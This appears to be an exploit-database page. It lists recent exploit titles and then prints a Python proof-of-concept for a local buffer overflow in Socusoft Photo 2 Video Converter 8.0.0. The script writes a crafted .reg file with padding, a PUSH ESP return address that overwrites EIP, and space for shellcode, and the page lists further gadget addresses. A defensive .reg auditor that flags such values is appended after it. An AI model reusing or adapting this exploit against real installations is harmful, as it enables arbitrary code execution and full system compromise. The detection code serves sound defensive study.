
20 changes to exploits/shellcodes

Allok QuickTime to AVI MPEG DVD Converter 3.6.1217 - Buffer Overflow
Jnes 1.0.2 - Stack Buffer Overflow
Socusoft Photo 2 Video Converter 8.0.0 - Local Buffer Overflow
netek 0.8.2 - Denial of Service
Cisco Smart Install - Crash (PoC)
Schneider Electric InduSoft Web Studio and InTouch Machine Edition - Denial of Service
Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free
Linux Kernel 2.6.32 < 3.x.x (CentOS) - 'PERF_EVENTS' Local Privilege Escalation (1)
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1)
Adobe Reader PDF - Client Side Request Injection
Windows - Local Privilege Escalation
Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit)
Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - 'Jakarta' Multipart Parser OGNL Injection (Metasploit)
Adobe Flash < 28.0.0.161 - Use-After-Free
Norton Core Secure WiFi Router - 'BLE' Command Injection (PoC)
GPON Routers - Authentication Bypass / Command Injection
TBK DVR4104 / DVR4216 - Credentials Leak
Call of Duty Modern Warefare 2 - Buffer Overflow
Squirrelcart 1.x.x - 'cart.php' Remote File Inclusion
Squirrelcart 1.x - 'cart.php' Remote File Inclusion
Infinity 2.x.x - options[style_dir] Local File Disclosure
Infinity 2.x - 'options[style_dir]' Local File Disclosure
PHP-Nuke 8.x.x - Blind SQL Injection
PHP-Nuke 8.x - Blind SQL Injection
WHMCompleteSolution (WHMCS) 3.x.x < 4.0.x - 'cart.php' Local File Disclosure
WHMCompleteSolution (WHMCS) 3.x < 4.0.x - 'cart.php' Local File Disclosure
WHMCompleteSolution (WHMCS) 3.x.x - 'clientarea.php' Local File Disclosure
WHMCompleteSolution (WHMCS) 3.x - 'clientarea.php' Local File Disclosure
Ajax Availability Calendar 3.x.x - Multiple Vulnerabilities
Ajax Availability Calendar 3.x - Multiple Vulnerabilities
vBulletin vBSEO 4.x.x - 'visitormessage.php' Remote Code Injection
vBulletin vBSEO 4.x - 'visitormessage.php' Remote Code Injection
WordPress Theme Photocrati 4.x.x - SQL Injection / Cross-Site Scripting
WordPress Theme Photocrati 4.x - SQL Injection / Cross-Site Scripting
Subrion 3.X.x - Multiple Vulnerabilities
Subrion 3.x - Multiple Vulnerabilities
Ciuis CRM 1.0.7 - SQL Injection
LifeSize ClearSea 3.1.4 - Directory Traversal
WordPress Plugin Activity Log 2.4.0 - Cross-Site Scripting
DLINK DCS-5020L - Remote Code Execution (PoC)
Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection
77 lines
No EOL
2.2 KiB
Python
Executable file
# Exploit Title: Socusoft Photo 2 Video Converter v8.0.0 Local Buffer Overflow (Free and Professional variants)
# Date: 01/12/2017
# Exploit Author: Jason Magic (ret2eax)
# Vendor Homepage: www.socusoft.com
# Version: 8.0.0
# Tested on: Windows Server 2008 R2

# Socusoft's Photo 2 Video Converter v8.0.0 (Free and Professional variants)
# contains a local buffer overflow condition in the pdmlog.dll library.
# Exploitation can result in register rewrites to control program execution
# flow, therefore, resulting in the ability to execute arbitrary shellcode leading
# to complete system compromise.

# Import generated .reg prior to restarting the executable within a debugger

# The following PUSH ESP, RETN instruction sequence addresses are suitable to
# redirect program execution:

# DVDPhotoData.dll:

# 0x10002352 push esp; ret
# 0x10013945 push esp; retn 0x0004
# 0x1004cb83 push esp; retn 0x0008
# 0x1004cbb8 push esp; retn 0x0008
# 0x1004cc11 push esp; retn 0x0008

# BEGIN EXPLOIT POC

#!/usr/bin/python

# REGISTERS (POC)

# EAX 42424242
# ECX 0002BF3B pdmlog.<ModuleEntryPoint>
# EDX 00020000 pdmlog.00020000
# EBX 00020000 pdmlog.00020000
# ESP 035BFB90
# EBP 035BFBAC
# ESI 00000002
# EDI 00000000
# EIP 42424242

# EAX 10013945 DVDPhoto.10013945
# ECX 0002BF3B pdmlog.<ModuleEntryPoint>
# EDX 00020000 pdmlog.00020000
# EBX 00020000 pdmlog.00020000
# ESP 03A0FB90
# EBP 03A0FBAC
# ESI 00000002
# EDI 00000000
# EIP 10013945 DVDPhoto.10013945 <- EIP Overwrite '\x45\x39\x01\x10'

# outfile
file = "proof-of-concept.reg"

# register re-write
padding = "\x41" * 548
eipOffset = "\x45\x39\x01\x10" # PUSH ESP (0x10013945)
stackRewrite = "\x43" * 400 # Shellcode Space

# generate exploit file containing above payload instructing EIP overwrite

poc = "Windows Registry Editor Version 5.00\n\n"
poc = poc + "[HKEY_CURRENT_USER\Software\Socusoft Photo to Video Converter Free Version\General]\n"
poc = poc + "\"TempFolder\"=\"" + padding + eipOffset + stackRewrite + "\""

try:
    print "[*] Generating exploit contents...\n";
    print "[*] Creating payload file...\n";
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] Success!";
except:
    print "[!] ERROR!";

#EOF
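The PoC above works by getting an oversized "TempFolder" string into the application's registry key, which pdmlog.dll then copies into a fixed-size buffer. The following is an added example, not part of the ret2eax PoC or of the vendor's code, written from the importing side: a small .reg auditor that parses REG_SZ entries and flags any string value that is far too long to be a real folder path or that carries raw control bytes, so a file like the one the PoC generates can be caught before it is imported. The 260-character threshold is Windows MAX_PATH; the benign and suspect .reg texts are constructed for this example (the suspect one reuses the PoC's key and value name but placeholder bytes, not the PoC's address bytes).

```python
"""Audit a Windows .reg export for string values that could not be real paths.

Added example, not part of the ret2eax PoC above. It looks at the issue from
the importing side: a "TempFolder" string of several hundred bytes, or one
carrying raw control bytes, is something a reviewer can flag before the file
is ever imported. The 260-character limit is Windows MAX_PATH; the sample
.reg texts below are constructed for this example.
"""
import re

# Windows MAX_PATH. A folder path stored by a desktop application should
# never approach this, so anything longer is treated as suspicious.
MAX_PATH = 260

# "[HKEY_...\Sub\Key]" section header and "Name"="value" (REG_SZ) lines.
_KEY_LINE = re.compile(r'^\[(?P<key>[^\]]+)\]\s*$')
_SZ_LINE = re.compile(r'^"(?P<name>[^"]+)"="(?P<value>.*)"\s*$')


def parse_reg(text):
    """Return (key, value_name, value) for every REG_SZ entry in a .reg text."""
    entries = []
    current_key = None
    for raw in text.splitlines():
        line = raw.strip()
        key_match = _KEY_LINE.match(line)
        if key_match:
            current_key = key_match.group("key")
            continue
        sz_match = _SZ_LINE.match(line)
        if sz_match and current_key is not None:
            entries.append((current_key, sz_match.group("name"), sz_match.group("value")))
    return entries


def find_suspicious(text, max_len=MAX_PATH):
    """Flag string values longer than max_len or containing non-printable bytes.

    Returns a list of dicts: key, name, length and the reasons for the flag.
    """
    findings = []
    for key, name, value in parse_reg(text):
        reasons = []
        if len(value) > max_len:
            reasons.append("length %d exceeds %d" % (len(value), max_len))
        if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value):
            reasons.append("contains non-printable bytes")
        if reasons:
            findings.append({"key": key, "name": name, "length": len(value), "reasons": reasons})
    return findings


# Constructed benign export: a normal-looking path under the key the PoC targets.
BENIGN_REG = (
    "Windows Registry Editor Version 5.00\n\n"
    "[HKEY_CURRENT_USER\\Software\\Socusoft Photo to Video Converter Free Version\\General]\n"
    '"TempFolder"="C:\\\\Users\\\\Public\\\\Temp"\n'
)

# Constructed suspect export: same key, but the value is 952 characters of
# filler with four placeholder control bytes in the middle (not the PoC's bytes).
SUSPECT_REG = (
    "Windows Registry Editor Version 5.00\n\n"
    "[HKEY_CURRENT_USER\\Software\\Socusoft Photo to Video Converter Free Version\\General]\n"
    '"TempFolder"="' + "A" * 548 + "\x01\x02\x03\x04" + "C" * 400 + '"\n'
)


def main():
    for label, text in (("benign", BENIGN_REG), ("suspect", SUSPECT_REG)):
        findings = find_suspicious(text)
        print("%s: %d suspicious value(s)" % (label, len(findings)))
        for item in findings:
            print("  %s\\%s (len %d): %s" % (
                item["key"], item["name"], item["length"], "; ".join(item["reasons"])))


if __name__ == "__main__":
    main()
```

The PoC writes its .reg file as plain ASCII, which is what the parser above reads; a file exported by regedit itself is UTF-16LE with a BOM and should be decoded before being passed to `find_suspicious`. The same length check applied to the live value in the application's key (rather than to an import file) is the natural host-side detection for a system where the file may already have been imported.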